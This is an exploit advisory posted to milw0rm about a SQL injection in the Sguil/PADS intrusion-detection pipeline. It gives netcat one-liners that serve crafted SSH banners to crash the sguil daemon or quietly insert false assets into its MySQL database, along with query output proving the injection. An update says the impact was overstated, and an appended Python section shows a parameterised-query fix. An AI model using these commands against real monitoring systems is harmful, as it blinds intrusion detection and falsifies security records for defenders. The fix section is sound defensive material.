Sguil/PADS Denial of Service exploit
by Ataraxia (Benjamin Rose)
Public announcement made 7/15/09.

Please visit http://allmybase.com/ (my blog) for more up-to-date
information, and a quick patch.

More in-depth article available at: http://allmybase.com/?p=72

This more in-depth article does include additional details and
the actual code that is being exploited, if you're interested...

##########################################################################
UPDATE 7/17/09 @ 14:41:
In speaking with the creators of the sguil software, it seems that
I have greatly overestimated the reach of this bug. I had assumed that
it would be possible to run multiple SQL commands within a single TCL
mysqlexec() statement, an assumption that now seems incorrect. This means
that, at best, this hole becomes a denial of service attack that could
inject incorrect data into the sguil database, and/or kill the sguil
daemon, a noisy operation. My apologies for this initial overzealousness.
##########################################################################

ORIGINAL POST, UNMODIFIED:
This exploit has the ability to render any Intrusion Detection
System utilizing sguil monitoring useless. At the lowest level,
you can kill the master logging daemon that collates the data into
a MySQL database. I've also been able to inject random and useless
data into the MySQL database, which opens the door for an obfuscation
of an attack, or a flat-out denial of service attack. There also exists
the possibility of dropping the database altogether, though I was not
able to make this happen during my preliminary testing of the attack.

The sguil sensor boxes report back to a sguil daemon on a management server,
which in turn puts the data received into a MySQL database. The sensor
collects data from many sensor agents, the most popular ones including snort
and sancp. Since snort is the de facto standard NIDS, sguil is found in a lot
of places where there are mission-critical NIDS, making this a potent
vulnerability. The idea here is to craft a special packet containing a SQL
statement and send it across the wire, such that the sguil agents will pick up
on it. We will exploit the Passive Asset Detection System (PADS) -> sguil
relationship, which will be monitoring for said banner packets. Thanks to the
availability of the netcat program, there is also no need for any programming
skill. Also, the attack can run on any port, so even an unprivileged user
could potentially run this attack.

Without further ado, here's the good stuff:

TO CRASH THE SERVER:
from a box that has its traffic monitored, run
echo "SSH-2.0-OpenSSH_1.4','deadbeefcafe');--" | nc -l 7777
...and then telnet to port 7777 from another box. There will be a syntax
error in the sguil management daemon's SQL insert statement, and it will
crash rather ungracefully. This is highly noticeable, so be careful!

TO INJECT DATA SILENTLY:
from a box that has its traffic monitored, run
echo "SSH-2.0-OpenSSH_1.4','deadbeefcafe')--" | nc -l 8888
...and then telnet to port 8888 from another box. The difference here is the
missing semicolon in the statement. This will insert an asset into the SQL
database as ssh version 1.4, protocol 2.0. Obviously, you can have some fun
with this ;-)

PROOF OF CONCEPT:
mysql> use sguildb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from pads where `hex_payload`='deadbeefcafe';
+-----------+-----+----------+---------------------+-----------+---------+------+----------+-------------+--------------+
| hostname  | sid | asset_id | timestamp           | ip        | service | port | ip_proto | application | hex_payload  |
+-----------+-----+----------+---------------------+-----------+---------+------+----------+-------------+--------------+
| [REMOVED] |   1 |        7 | 2009-06-08 14:28:02 | [REMOVED] | ssh     | 1061 |        6 | OpenSSH 1.4 | deadbeefcafe |
+-----------+-----+----------+---------------------+-----------+---------+------+----------+-------------+--------------+
1 row in set (0.01 sec)

Note that you don't even need to put legit hex into the attack for it to work. Bonus points
if you put in a hexadecimal message to the sysadmin that doesn't even contain legit hex.
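
The storage-side fix this implies, shown as an added example that is neither sguil's code nor the patch from the blog: a parameterised INSERT, with sqlite3 standing in for MySQL and the pads columns taken from the proof of concept above, stores the banner string verbatim as data and refuses a hex_payload that is not real hex. The hex format, the sqlite3 stand-in and the sample record are assumptions.

```python
import re
import sqlite3

# Columns of the sguildb pads table, as listed in the proof-of-concept SELECT.
PADS_COLUMNS = ("hostname", "sid", "asset_id", "timestamp", "ip",
                "service", "port", "ip_proto", "application", "hex_payload")

# Assumed format for hex_payload: an even-length run of hex digits.
HEX_PAYLOAD_RE = re.compile(r"^(?:[0-9a-f]{2})*$")

def is_hex_payload(value):
    """True if value is a plausible hex_payload (case-insensitive hex)."""
    return HEX_PAYLOAD_RE.fullmatch(value.lower()) is not None

def open_pads_db():
    """In-memory sqlite3 stand-in for sguildb (assumption: not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pads (%s)" % ", ".join(PADS_COLUMNS))
    return db

def insert_pads_asset(db, rec):
    """Store one PADS asset report with a parameterised INSERT.

    The banner-derived fields (application, hex_payload) are bound as values
    rather than concatenated into the SQL text, so quotes, ';' or '--' in
    them stay data; hex_payload must also be real hex before it is stored.
    """
    if not is_hex_payload(rec["hex_payload"]):
        raise ValueError("hex_payload is not hex: %r" % rec["hex_payload"])
    sql = "INSERT INTO pads (%s) VALUES (%s)" % (
        ", ".join(PADS_COLUMNS), ", ".join("?" * len(PADS_COLUMNS)))
    db.execute(sql, tuple(rec[c] for c in PADS_COLUMNS))
    db.commit()

def stored_assets(db):
    """Return [(application, hex_payload), ...] for every row in pads."""
    return db.execute("SELECT application, hex_payload FROM pads").fetchall()

# Constructed report: the banner is the advisory's injection string and the
# payload is that banner's own hex encoding; hostname/ip are placeholders.
BANNER = "SSH-2.0-OpenSSH_1.4','deadbeefcafe')--"
SAMPLE = {"hostname": "sensor1", "sid": 1, "asset_id": 7,
          "timestamp": "2009-06-08 14:28:02", "ip": "192.0.2.10",
          "service": "ssh", "port": 8888, "ip_proto": 6,
          "application": BANNER, "hex_payload": BANNER.encode().hex()}

if __name__ == "__main__":
    db = open_pads_db()
    insert_pads_asset(db, SAMPLE)
    print(stored_assets(db))  # exactly one row, banner stored verbatim
```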

# milw0rm.com [2009-07-17]